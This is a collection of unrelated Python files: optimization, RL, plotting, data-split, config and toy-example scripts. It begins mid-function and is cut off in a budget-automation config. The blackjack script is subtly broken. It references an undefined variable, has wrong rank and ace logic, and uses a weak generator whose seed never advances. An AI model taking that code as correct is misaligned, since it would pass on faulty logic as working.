return f"{hours} hour{'s' if hours != 1 else ''} and {mins} minute{'s' if mins != 1 else ''}"
|
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import gurobipy as gp
from gurobipy import GRB
from gurobipy import GurobiError
from gurobipy import quicksum
from decouple import config
from datetime import datetime, timedelta
from models import *
from main_config import *
from models.initial_model import InitialModel
from models.initial_model_validineq import InitialModelValidIneq
from models.reoptimization_model import ReoptModel
from models.reoptimization_model_validineq import ReoptModelValidIneq
def main(
num_events,
sleep,
start_time,
test_instance,
valid_ineq,
total_time,
subtour,
complexity_instance,
):
"""
This function performs a run for the DDDARP problem, where requests that are known in advance are planned and routed initially,
as well as new requests are received throughout the day. When a new request arrives, a reoptimization model is utilized to first
decide if the new request is accepted or rejected, and if accepted, a new optimal route is planned based off of the earlier plan
and the new request.
"""
# Initial Route Plan
print("Running Initial Model")
runtime_track = []
init_model = InitialModelValidIneq(subtour) if valid_ineq else InitialModel()
initial_route_plan = init_model.run_model()
num_requests = init_model.get_n()
rejected = []
runtime_track.append([num_requests, (datetime.now() - start_time).total_seconds()])
operational = None
quality = None
cumulative_z = 0
# Event Based Rerouting
for i in range(num_events):
print("Event Based Reoptimization")
first = True if i == 0 else False
event = get_event(i, test_instance, complexity_instance)
num_requests += 1
reopt_model = (
ReoptModelValidIneq(
initial_route_plan, event, num_requests, first, rejected
)
if valid_ineq
else ReoptModel(initial_route_plan, event, num_requests, first, rejected)
)
(
reopt_plan,
rejected,
num_unused_vehicles,
operational,
quality,
single_z,
) = reopt_model.run_model()
if i != num_events - 1:
print("Waiting for new request")
time.sleep(sleep)
initial_route_plan = reopt_plan
runtime_track.append(
[num_requests, (datetime.now() - start_time).total_seconds()]
)
if i != num_events - 1:
cumulative_z += single_z
df_runtime = pd.DataFrame(
runtime_track, columns=["Number of Requests", "Solution Time"]
)
# plot(df_runtime)
print(
"Service Rate Whole: ",
str(round(100 * (num_requests - len(rejected)) / (num_requests), 2)) + "%",
)
print(
"Service Rate of New Events: ",
str(round(100 * (num_events - len(rejected)) / (num_events), 2)) + "%",
)
print(
"Number of Vehicles Not Used: ",
num_unused_vehicles,
)
print("Runtime: ", df_runtime.tail(1))
return operational, quality + cumulative_z, df_runtime.tail(1)
def plot(df):
ax = plt.gca()
df.plot(kind="line", x="Number of Requests", y="Solution Time", color="pink", ax=ax)
# df.plot(kind='line',x='name',y='num_pets', , ax=ax)
# the plot gets saved to 'solution_time.png'
plt.savefig("solution_time.png")
plt.show()
def get_event(i, test_instance, complexity_instance):
if test_instance:
df = pd.read_csv(config("data_path_test_instances_events"))
return df.iloc[i]
if complexity_instance:
df = pd.read_csv(config("data_path_complexity_events"))
return df.iloc[i]
else:
df = pd.read_csv(config("data_path_events"))
return df.iloc[i]
if __name__ == "__main__":
operational, quality, runtime = main(
num_events,
sleep,
start_time,
test_instance,
valid_inequalities,
total_time,
subtour,
complexity_instance,
)
|
from abc import ABC, abstractmethod
class RecurrentPolicy(ABC):
"""Abstract recurrent policy class. Computes actions given relevant information."""
@abstractmethod
def get_actions(self, obs, prev_actions, rnn_states, available_actions, t_env, explore):
"""
Compute actions using the needed information.
:param obs: (np.ndarray) Observations with which to compute actions.
:param prev_actions: (np.ndarray) Optionally use previous action to compute actions.
:param rnn_states: (np.ndarray / torch.Tensor) RNN state to use to compute actions
:param available_actions: (np.ndarray) contains actions which are available to take. If None, there are no action restrictions.
:param t_env: (int) train step during which this function is called. Used to compute epsilon for eps-greedy exploration.
:param explore: (bool) whether to return actions using an exploration policy.
:return: (torch.Tensor / np.ndarray) computed actions (np.ndarray if explore is True, torch.Tensor else)
:return: (torch.Tensor) updated RNN hidden states
:return: (torch.Tensor) additional information, depending on algorithms (e.g. action entropy for RMASAC).
"""
raise NotImplementedError
@abstractmethod
def get_random_actions(self, obs, available_actions):
"""
Compute actions uniformly at random.
:param obs: (np.ndarray) Current observation corresponding to actions.
:param prev_actions: (np.ndarray) Optionally use previous action to compute actions.
:return: (np.ndarray) random actions
"""
raise NotImplementedError
@abstractmethod
def init_hidden(self, num_agents, batch_size):
"""
Initialize RNN hidden states.
:param num_agents: (int) size of agent dimension (-1 if there should not be an agent dimension).
:param batch_size: (int) number of RNN states to return per agent.
:return: (torch.Tensor) 0-initialized RNN states.
"""
raise NotImplementedError |
from .make_schedule import schedule
import json
import os
path = os.path.dirname(os.path.abspath(__file__))
def update_schedule():
schedule.main()
with open(f'{path}/result.json', 'r') as f:
parsed = json.load(f)
return parsed
def retrieve_schedule():
with open(f'{path}/result.json', 'r') as f:
parsed = json.load(f)
return parsed |
# dir includes wiki raw data
PUKIWIKI_DATA_DIR = "/home/www/inside-cgi/wiki/wiki"
ELASTIC_SEARCH_ENDPOINT = "http://heineken-elasticsearch.sandbox.svc.cluster.local:9200/"
INDEX = "pukiwiki"
INDEX_FILE = "index/pukiwiki.json"
|
import subprocess
import sys
import os
import math
import random
import datetime
import shutil
import re
import json
FULL_PERF_EVAL = "1000"
epochs = 1
if len(sys.argv) < 2:
print("Results directory not specified")
sys.exit(0)
def slurp(filepath):
f = open(filepath, "r")
s = f.read()
f.close()
return s
nccl_path = os.path.abspath("../nccl")
resultsDir = os.path.abspath(sys.argv[1])
assert "NPROC" in os.environ, "Set NPROC to number of processes"
nranks = os.environ.get("NPROC")
resultsDir = os.path.abspath(resultsDir)
if not os.path.exists(resultsDir):
print ('Results directory "%s" do not exist.'%(resultsDir))
parent_dir = os.getcwd()
nccl_path = os.path.join(parent_dir, nccl_path)
def execute_command(c):
s, o = subprocess.getstatusoutput(c)
if s != 0:
raise Exception("Command '%s' unsuccessful:\n"%c +o)
return (s, o)
results = {"model-parallel-mm-ar-c": [],
"model-parallel-mm-rs-c-ag": [],
"model-parallel-ol-mm-fuse-rs-c-ag": []}
for appdir in os.listdir(resultsDir):
command = slurp(os.path.join(resultsDir, appdir, "json.json"))
binary = command[command.find("model-parallel-"):].split(" ")[0].strip()
resultstxt = slurp(os.path.join(resultsDir, appdir, "stdout.txt"))
dicts = re.findall(r'{.+}', resultstxt)
dicts = [re.sub(r'([a-zA-Z_]+\d*)',r'"\1"', s) for s in dicts]
print (dicts)
resultsjson = [json.loads(s) for s in dicts]
results[binary] = resultsjson
print(results)
binaries = ["model-parallel-mm-ar-c", "model-parallel-mm-rs-c-ag", "model-parallel-ol-mm-fuse-rs-c-ag"]
rows_H = []
for i in [0, 1]:
binaryResult = results[binaries[0]]
B_8_results = binaryResult[i]
row = [(i+1)*8, B_8_results["AllReduce"], B_8_results["matMul0"], B_8_results["binOpFunc0"], B_8_results["Total"]]
binaryResult = results[binaries[1]]
B_8_results = binaryResult[i]
row += [B_8_results["binOpFunc0"], B_8_results["ReduceScatter"], B_8_results["AllGather"], B_8_results["Total"]]
binaryResult = results[binaries[2]]
B_8_results = binaryResult[i]
row += [B_8_results["overlap"]]
rows_H += [row]
print (rows_H)
rows_4H = list(rows_H)
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import csv
import sys
from matplotlib import ticker
from functools import reduce
def remove_chunk_from_string(s):
return s[s.find(')')+1:].strip()
def batch_size_from_matmul(matmul):
if str(8*1024) in matmul:
return 8
elif str(16*1024) in matmul:
return 16
elif str(32*1024) in matmul:
return 32
elif str(64*1024) in matmul:
return 64
x = []
small_y = [[],[],[]] #relative bandwidth
small_cublas_y = []
small_allreduce_y = []
small_compute_y = [[], []]
small_reducescatter_y = []
small_allgather_y = []
big_y = [[], [], []]
big_cublas_y = []
big_allreduce_y = []
big_compute_y = [[], []]
big_reducescatter_y = []
big_allgather_y = []
gshard_speedup = []
coconet_speedup = []
megatron_speedup = []
coconet_baseline_speedup = []
megatron_speedup_big = [1.05, 1.05, 1.06, 1.06]
megatron_speedup_small = [1.06, 1.07, 1.08, 1.09]
for row in rows_H:
data = row
if row[0] == "":
continue
if True: # skip header and 512 size
x.append(data[0])
baseline = float(data[4])
matmul_time = float(data[2])
allreduce = float(data[1])
small_allreduce_y.append(allreduce/baseline)
small_cublas_y.append(matmul_time/baseline)
small_compute_y[0].append(1 - (small_allreduce_y[-1] + small_cublas_y[-1]))
small_y[0].append(1/ (baseline / baseline ))
gshard = float(data[8])
ag = float(data[7])
rs = float(data[6])
sliced_compute = float(data[5])
diff = gshard - ag - rs - sliced_compute - matmul_time
small_allgather_y += [(ag+diff/2)/baseline]
small_reducescatter_y += [(rs+diff/2)/baseline]
small_compute_y[1] += [(sliced_compute)/baseline]
small_y[1].append( 1/((baseline * 1.05)/ gshard))
small_y[2].append( 1/((baseline * 1.05) / row[9]))
gshard_speedup.append(baseline/gshard* 1.05)
coconet_speedup.append(1/small_y[2][-1])
coconet_baseline_speedup.append(1.05)
# bwy[1].append(data[6])
# bwy[2].append(data[7])
# bwy[3].append(data[8])
if True: # skip header and 512 size
baseline = float(data[4])
matmul_time = float(data[2])
small_allreduce_y.append(float(data[1])/baseline)
small_cublas_y.append(matmul_time/baseline)
small_compute_y[0].append(1 - (small_allreduce_y[-1] + small_cublas_y[-1]))
small_y[0].append(1/ (baseline / float(data[4])))
gshard = float(data[8])
ag = float(data[7])
rs = float(data[6])
sliced_compute = float(data[5])
diff = gshard - ag - rs - sliced_compute - matmul_time
small_allgather_y += [(ag+diff/2)/baseline]
small_reducescatter_y += [(rs+diff/2)/baseline]
small_compute_y[1] += [(sliced_compute)/baseline]
small_y[1].append( 1/((baseline * 1.05) / gshard))
small_y[2].append( 1/((baseline * 1.05) / row[9]))
gshard_speedup.append(1/small_y[1][-1])
coconet_speedup.append(1/small_y[2][-1])
coconet_baseline_speedup.append(1.05)
def autolabel(rects, values):
"""
Attach a text label above each bar displaying its height
"""
for i, rect in enumerate(rects):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., rect.get_y() + height,
r"{: .2f}$\times$".format(values[i]),
ha='center', va='bottom', fontsize=10, rotation=90)
print(small_y[2])
#### Smaller Matmul
small_compute_y = [np.array(x) for x in small_compute_y]
x = x + x
xx = np.arange(len(x))
barwidth = 0.2
fig, ax = plt.subplots()
ax.minorticks_on()
colors={"AR":'#093D87', "MM":'#2171B6', "C":'#cde6c7', "AG":'#6FBBE2', "RS":'#3C7255', "coconet": '#F58E35'}
ax.bar(xx+0*barwidth, small_allreduce_y, color = colors["AR"], edgecolor='white', width=barwidth)
ax.bar(xx+0*barwidth, small_cublas_y, bottom=small_allreduce_y, color = colors["MM"], edgecolor='white', width=barwidth)
ax.bar(xx+0*barwidth, small_compute_y[0], bottom=np.add(small_cublas_y, small_allreduce_y).tolist(), color = colors["C"], edgecolor='white', width=barwidth)
ax.bar(xx+1*barwidth, small_allreduce_y, color = colors["AR"], edgecolor='white', width=barwidth, label='AR')
ax.bar(xx+1*barwidth, small_cublas_y, bottom=small_allreduce_y, color = colors["MM"], edgecolor='white', width=barwidth, label='MM')
coconet_baseline_rects = ax.bar(xx+1*barwidth, small_compute_y[0]/1.5, bottom=np.add(small_cublas_y, small_allreduce_y).tolist(), color = colors["C"], edgecolor='white', width=barwidth, label='C')
ax.bar(xx+2*barwidth, small_reducescatter_y, color = colors["RS"], width=barwidth, edgecolor='white', label='RS')
ax.bar(xx+2*barwidth, small_allgather_y, bottom=small_reducescatter_y, color = colors["AG"], width=barwidth, edgecolor='white', label='AG')
ax.bar(xx+2*barwidth, small_cublas_y, bottom=np.add(small_reducescatter_y, small_allgather_y).tolist(), color = colors["MM"], width=barwidth, edgecolor='white')
gshard_rects = ax.bar(xx+2*barwidth, small_compute_y[1], bottom=np.add(np.add(small_reducescatter_y, small_allgather_y), small_cublas_y).tolist(), color = colors["C"], width=barwidth, edgecolor='white')
coconet_rects = ax.bar(xx+3*barwidth, small_y[2], color = colors["coconet"], width=barwidth, label='Overlap+Fuse', edgecolor='white')
autolabel(coconet_baseline_rects, coconet_baseline_speedup)
autolabel(gshard_rects, gshard_speedup)
autolabel(coconet_rects, coconet_speedup)
rects_locs = xx.tolist() + (xx + 1*barwidth + 0.0001).tolist() + (xx + 2*barwidth).tolist() + (xx + 3*barwidth).tolist()
ax.set_xticks(rects_locs, minor = True)
new_ticks = reduce(lambda x, y: x + y, map(lambda x: [x] * 4, ["MegatronLM", "MM-AR-C", "GShard-Eq", "CoCoNet"]))
ax.xaxis.set_minor_formatter(ticker.FixedFormatter(new_ticks)) #add the custom ticks
ax.tick_params(axis='x', which='major', pad=60)
ax.tick_params(axis='x', which='both',labelsize=12)
plt.ylabel('Times normalized to\n MegatronLM', fontsize=12)
plt.xticks([r + barwidth for r in range(len(xx))], ['B=%d'%val for val in x])
ax.set_ylim([0.2,1.2])
plt.legend(loc='upper left', fontsize='large',bbox_to_anchor=(-0.1, 1.26),ncol=6,columnspacing=1,handlelength=1.7)
ax.grid(axis='y')
plt.setp(ax.xaxis.get_minorticklabels(), rotation=45, ha='right')
ax.text(0,-0.52, "[B, S, H/16] x [H/16, H]", fontsize=12)
ax.text(1.9,-0.52, "[B, S, 4*H/16] x [4*H/16, H]", fontsize=12)
fig = plt.gcf()
fig.subplots_adjust(bottom=0.38)
fig.set_size_inches(6.8, 3.8)
fig.savefig("Figure 11.pdf",bbox_inches=0,pad_inches=0) |
from typing import Tuple
from showml.losses.base_loss import Loss
from abc import ABC, abstractmethod
import numpy as np
class Optimizer(ABC):
def __init__(self, loss_function: Loss, learning_rate: float):
"""
Base Optimzer class
param loss_function: The loss function to be optimized and for computing the gradient
param learning_rate: the learning rate (how much to update the weights at each iteration)
"""
self.loss_function = loss_function
self.learning_rate = learning_rate
@abstractmethod
def update_weights(
self,
X: np.ndarray,
y: np.ndarray,
z: np.ndarray,
weights: np.ndarray,
bias: float,
) -> Tuple[np.ndarray, float]:
"""
Update the weights of the model using the specified loss function and optimizer
param X: The input training set
param y: The true labels of the training data
param z: The predicted labels
param error: The difference between prediction and true values
param weights: The set of training weights of the model
param bias: The bias value of the model
return weights, bias: The set of updated weights and bias after optimization for an epoch
"""
pass
|
# first download iris dataset as [iris.txt] from the link below
# https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multiclass/iris.scale
# then run this script to generate train and test set
def get_index_list(shuffle=True, seed=None):
import numpy as np
index_list = np.arange(150)
if shuffle:
if seed:
np.random.seed(seed)
np.random.shuffle(index_list)
return index_list
def get_train_and_test_data(train_ratio=0.8, shuffle=True, seed=1):
size = 150
train_size = int(size * train_ratio)
test_size = size - train_size
index_list = get_index_list(shuffle=shuffle, seed=seed)
train_index = index_list[:train_size]
test_index = index_list[train_size:]
with open('iris.txt') as f:
dataset = f.read().split('\n')
# train_set
with open('iris_train.txt', 'w') as f:
for i in train_index:
f.write(dataset[i] + '\n')
# test_set
with open('iris_test.txt', 'w') as f:
for i in test_index:
f.write(dataset[i] + '\n')
if __name__ == '__main__':
get_train_and_test_data(train_ratio=0.7, shuffle=True, seed=2)
|
EPSILON = "epsilon"
K = "k"
MAX_VALUE = "max_value"
MIN_VALUE = "min_value"
ATTRIBUTE = "attribute"
NAME = "name"
SENSITIVITY_TYPE = "sensitivity_type"
ATTRIBUTE_TYPE = "attribute_type"
# window size is used in the disclosure risk calculation
# it indicates the % of the num of records in the dataset
WINDOW_SIZE = 1
# border margin is used in differential privacy anonymization
# it indicates the margin to be applied to the attribute domain
BORDER_MARGIN = 1.5
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
tevt.py : Loads a single event
===================================================
Expected output below shows the dimensions of the constitent numpy arrays that comprise the event::
Evt(-4,"torch","PmtInBox","PmtInBox/torch/-4 : ", seqs="[]")
fdom : (3, 1, 4) : (metadata) 3*float4 domains of position, time, wavelength (used for compression)
idom : (1, 1, 4) : (metadata) int domain
ox : (100000, 4, 4) : (photons) final photon step
wl : (100000,) : (photons) wavelength
post : (100000, 4) : (photons) final photon step: position, time
dirw : (100000, 4) : (photons) final photon step: direction, weight
polw : (100000, 4) : (photons) final photon step: polarization, wavelength
flags : (100000,) : (photons) final photon step: flags
c4 : (100000,) : (photons) final photon step: dtype split uint8 view of ox flags
rx_raw : (100000, 10, 2, 4) : (records) photon step records RAW:before reshaping
rx : (100000, 10, 2, 4) : (records) photon step records
ph : (100000, 1, 2) : (records) photon history flag/material sequence
ps : (100000, 1, 4) : (photons) phosel sequence frequency index lookups (uniques 30)
rs : (100000, 10, 1, 4) : (records) RAW recsel sequence frequency index lookups (uniques 30)
rsr : (100000, 10, 1, 4) : (records) RESHAPED recsel sequence frequency index lookups (uniques 30)
"""
import os, sys, logging, numpy as np
log = logging.getLogger(__name__)
from opticks.ana.base import opticks_main
from opticks.ana.evt import Evt
if __name__ == '__main__':
args = opticks_main(tag="10",src="torch", det="PmtInBox", doc=__doc__)
np.set_printoptions(suppress=True, precision=3)
for utag in args.utags:
try:
evt = Evt(tag=utag, src=args.src, det=args.det, seqs=[], args=args)
except IOError as err:
log.fatal(err)
sys.exit(args.mrc)
log.debug("evt")
print evt
log.debug("evt.history_table")
evt.history_table(slice(0,20))
log.debug("evt.history_table DONE")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Originally written by Philip Sterne <psterne@minervaproject.com>
#
# Jan 16, 2018 Qifan Yang <qifan@minerva.kgi.edu>
# Added implementation for class Card and Carddeck;
# Added multilingual support to reduce workload
import itertools
import gettext
class Card(object):
# Ref: Applied PRETTY_SUITS and STR_RANKS structure
# from https://github.com/worldveil/deuces/
# Constant for suits and ranks
PRETTY_SUITS = {
'h' : u'\u2660', # spades
'd' : u'\u2764', # hearts
'c' : u'\u2666', # diamonds
's' : u'\u2663' # clubs
}
STR_RANKS = ['A'] + [str(__) for __ in range(2, 11)] + ['J', 'Q', 'K']
def __init__(self, suit, rank):
if not suit in ['h', 'd', 'c', 's']:
raise Exception('Unknown Card Suit')
if not rank in range(1, 13):
raise Exception('Unknown Card rank')
self.suit = suit
self.rank = rank
def __repr__(self):
return self.PRETTY_SUITS[self.suit] + ' ' + self.STR_RANKS[self.rank - 1]
def value_blackjack(self):
'''Return the value of a card when in the game of Blackjack.
Input:
card: A string which identifies the playing card.
Returns:
int, indicating the value of the card in blackjack rule.
Strictly speaking, Aces can be valued at either 1 or 10, this
implementation assumes that the value is always 1, and then determines
later how many aces can be valued at 10. (This occurs in
blackjack_value.)
'''
return (self.rank < 10) * self.rank + (self.rank >= 10) * 10
def is_ace(self):
'''Identify whether or not a card is an ace.
Input:
card: A string which identifies the playing card.
Returns:
true or false, depending on whether the card is an ace or not.
'''
return self.rank == 1
class CardDeck(object):
def __init__(self, status = 'empty'):
if status == 'empty':
self.cards = []
elif status == 'full':
self.cards = [Card(suit, rank) for suit, rank in itertools.product(Card.PRETTY_SUITS, range(1, 13))]
else:
raise Exception('Unknown deck status')
def __repr__(self):
# For output
return str([Card.PRETTY_SUITS[__.suit] + ' ' + Card.STR_RANKS[__.rank - 1] for __ in self.cards])
def __getitem__(self, key):
# For indexing
return self.cards[key]
def append(self, card):
if type(card) != Card:
raise Exception('Invalid Card')
self.cards.append(card)
def pop(self, position = None):
if position == None:
return cards.pop()
else:
return cards.pop(position)
# Modify the code here for abstraction.
# ------------------------------------------------------
def pop_rand(self, rand_method, x, c, m):
''' This element returns a random card from a given list of cards.
Input:
deck: list of available cards to return.
x1: variable for use in the generation of random numbers.
x2: variable for use in the generation of random numbers.
'''
rand_num = random_number(x, c, m)
return self.cards.pop(rand_num % len(self.cards))
# ------------------------------------------------------
def blackjack_value(self):
'''Calculate the maximal value of a given hand in Blackjack.
Input:
cards: A list of strings, with each string identifying a playing card.
Returns:
The highest possible value of this hand if it is a legal blackjack
hand, or -1 if it is an illegal hand.
'''
sum_cards = sum([card.value_blackjack() for card in self.cards])
num_aces = sum([card.is_ace() for card in self.cards])
aces_to_use = max(int((21 - sum_cards) / 10.0), num_aces)
final_value = sum_cards + 10 * aces_to_use
if final_value > 21:
return -1
else:
return final_value
# Modify the code here for abstraction.
# ------------------------------------------------------
def random_number(x, c, m):
''' Produce a random number using the Park-Miller method.
See http://www.firstpr.com.au/dsp/rand31/ for further details of this
method. It is recommended to use the returned value as the value for x1,
when next calling the method.'''
return abs((c * x) % m)
# ------------------------------------------------------
def display(player, dealer, args):
'''Display the current information available to the player.'''
print(_('The dealer is showing: '), dealer[0])
print(_('Your hand is: '), player)
def hit_me(args):
'''Query the user as to whether they want another car or not.
Returns:
A boolean value of True or False. True means that the user does want
another card.
'''
ans = ""
while ans.lower() not in ('y', 'n'):
ans = input(_('Would you like another card? (y/n):'))
return ans.lower() == 'y'
def game(args):
# Modify the code here for abstraction.
# ------------------------------------------------------
from datetime import datetime
# randU initiation
x = int((datetime.utcnow() - datetime.min).total_seconds())
# Constants given by the RANDU algorithm:
# https://en.wikipedia.org/wiki/RANDU
c = 65539
m = 2147483648
# ------------------------------------------------------
# Initialize everything
deck = CardDeck(status = 'full')
my_hand = CardDeck(status = 'empty')
dealer_hand = CardDeck(status = 'empty')
# Deal the initial cards
for a in range(2):
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
my_hand.append(card)
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
dealer_hand.append(card)
# Give the user as many cards as they want (without going bust).
display(my_hand, dealer_hand, args)
while hit_me(args):
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
my_hand.append(card)
display(my_hand, dealer_hand, args)
if my_hand.blackjack_value() < 0:
print(_('You have gone bust!'))
break
# Now deal cards to the dealer:
print(_("The dealer has: "), repr(dealer_hand))
while 0 < dealer_hand.blackjack_value() < 17:
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
dealer_hand.append(card)
print(_('The dealer hits'))
print(_('The dealer has: '), repr(dealer_hand))
if dealer_hand.blackjack_value() < 0:
print(_("The dealer has gone bust!"))
else:
print(_('The dealer sticks with: '), repr(dealer_hand))
# Determine who has won the game:
my_total = my_hand.blackjack_value()
dealer_total = dealer_hand.blackjack_value()
if dealer_total == my_total:
print(_("It's a draw!"))
if dealer_total > my_total:
print(_("The dealer won!"))
if dealer_total < my_total:
print(_("You won!"))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description="BlackJack Game")
# Note that the rand_method argument is nor enabled in code!
parser.add_argument('--rand_method', default='randU',
help='The random number generator method. Choose between \'Mersenne\' and \'randU\'.')
args = parser.parse_args()
gettext.bindtextdomain('blackjack', 'locale/')
gettext.textdomain('blackjack')
_ = gettext.gettext
print()
print('BlackJack')
print('-' * 30)
print(vars(args))
print('-' * 30)
print()
game(args)
print()
|
from typing import List, Protocol
###############################################################################
# non volatile core of our application #
###############################################################################
class Ant(Protocol):
def do_your_job(self) -> None:
raise NotImplementedError
class AntQueen:
def __init__(self, ants: List[Ant]) -> None:
self._ants = ants
def do_morning_routine(self) -> None:
for ant in self._ants:
ant.do_your_job()
###############################################################################
# volatile part of our application #
###############################################################################
class WorkerAnt(Ant):
def do_your_job(self) -> None:
print("Worker ant is building the ant hill.")
class SoldierAnt(Ant):
def do_your_job(self) -> None:
print("Soldier ant is protecting the ant tribe.")
class NurseAnt(Ant):
def do_your_job(self) -> None:
print("Nurse ant is feeding the baby ants.")
class SkyDiverAnt(Ant):
def do_your_job(self) -> None:
print("Sky diver ant is diving in the sky.")
if __name__ == '__main__':
ants = [WorkerAnt(), SoldierAnt(), NurseAnt(), SkyDiverAnt()]
ant_queen = AntQueen(ants)
ant_queen.do_morning_routine() |
# -*- coding: utf-8 -*-
# Created on 07/01/2022 15:51:23
# @author: ErwingForero
#
from os import getcwd, path
from .feature_flags import ENVIROMENT
from dataframes import func
# Project constants
LOG_NAME = "aut_ppto"
PROCESS_NAME = "Proceso Automatización Presupuesto"
ICON_IMAGE = "icon.ico"
AFO_TYPES = {
"directa": {
"sheet": "AFO - Directa",
"regex_name": r".*directa.*",
"skiprows": [1, None],
"delimiter": ";",
"encoding": "latin-1",
"columns": [
"cod_oficina",
"oficina_venta",
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"agrupacion_clientes",
"formato",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_oficina": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price
},
"processes": ["formula", "assigment"]
},
"calle": {
"sheet": "AFO - Directa",
"regex_name": r".*calle.*",
"skiprows": [2, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"cod_agente_comercial",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_agente_comercial": func.mask_number,
"mes": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price
},
"processes": ["formula"]
},
"compra": {
"sheet": "AFO - Compra",
"regex_name": r".*compra.*",
"skiprows": [2, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
"cod_oficina",
"oficina_venta",
"cod_agente",
"agente",
"nombre_comercial",
"barrio",
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"agrupacion",
"formato",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_oficina": func.mask_number,
"cod_agente": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price,
},
"processes": ["formula", "assigment", "consolidation"]
},
}
DRIVER = {
"sheet": "Drivers",
"regex_name": r".*drive.*",
"skiprows": [1, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
# driver 0
"clave",
"id_consecutivo",
"sector",
"vacio1",
"categoria_producto",
"vacio2",
"subcategoria_producto",
"vacio3",
"linea_producto",
"vacio4",
"marca_producto",
"vacio5",
"vacio6",
"id_consecutivo2",
"sector2",
"vacio7",
"categoria_producto2",
"vacio8",
"subcategoria_producto2",
"vacio9",
"linea_producto2",
"vacio10",
"marca_producto2",
"vacio11",
"sep2",
"sep3",
"sep4",
"sep5",
"sep6",
"sep7",
"sep8",
"sep9",
"sep10",
# driver 1
"codigo_tipologia",
"tipologia",
"codigo_canal_transformado",
"canal_transformado",
"codigo_subcanal_transformado",
"subcanal_transformado",
"segmento",
"segmento_transformado",
"sep11",
"sep12",
"sep13",
"sep14",
# driver 2
"formato_orig",
"canal_transformado2",
"subcanal_transformado2",
"segmento2",
"agrupacion",
"formato",
"sep15",
"sep16",
"sep17",
# driver 3
"actual_codigo_ac",
"cod_ac_reemplazar",
"sep18",
"sep19",
# driver 4
"codigo_cliente",
"nombre_cliente",
"oficina_ventas_ecom"
],
"converters": {
"id_consecutivo": func.mask_number,
"actual_codigo_ac": func.mask_number,
"cod_ac_reemplazar": func.mask_number,
"codigo_cliente": func.mask_number
}
}
PROCESSES = {
"formula": {
"directa": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"extra_columns": ['agrupacion', 'formato'],
"key_merge_extra_columns": "tipologia",
"filter_add_columns": {"column": "formato", "pattern": "(?i)sin asignar"},
"add_columns": ['canal', 'sub_canal', 'segmento', 'agrupacion', 'formato'],
"add_columns_dif": "trans_",
"key_merge_add_columns":"formato_orig",
"validate_nan_columns": "all",
"agg_columns": ["cod_oficina", "oficina_venta", "canal", "sub_canal", "tipologia",
# are the same in add_columns with dif
"trans_canal", "trans_sub_canal", "trans_segmento", "trans_agrupacion", "trans_formato",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"calle": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"extra_columns": ['agrupacion', 'formato'],
"key_merge_extra_columns": "tipologia",
"new_columns": ['nombre_ac', 'oficina_venta'],
"add_columns": ['canal', 'sub_canal', 'segmento', 'agrupacion', 'formato'],
"add_columns_dif": "trans_",
"filter_replace_columns": {"column": "tipologia", "pattern": "(?i)sin asignar"},
"replace_columns_for": {"cod_canal": "T", "canal": "Tradicional", "cod_sub_canal": "TD", "sub_canal": "Tiendas", "cod_tipologia": "TG", "tipologia": "Tienda Mixta"},
"validate_nan_columns": "all",
"agg_columns": ["oficina_venta", "canal", "sub_canal", "tipologia", "cod_agente_comercial", "nombre_ac",
# are the same in add_columns with dif
"trans_canal", "trans_sub_canal", "trans_segmento",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
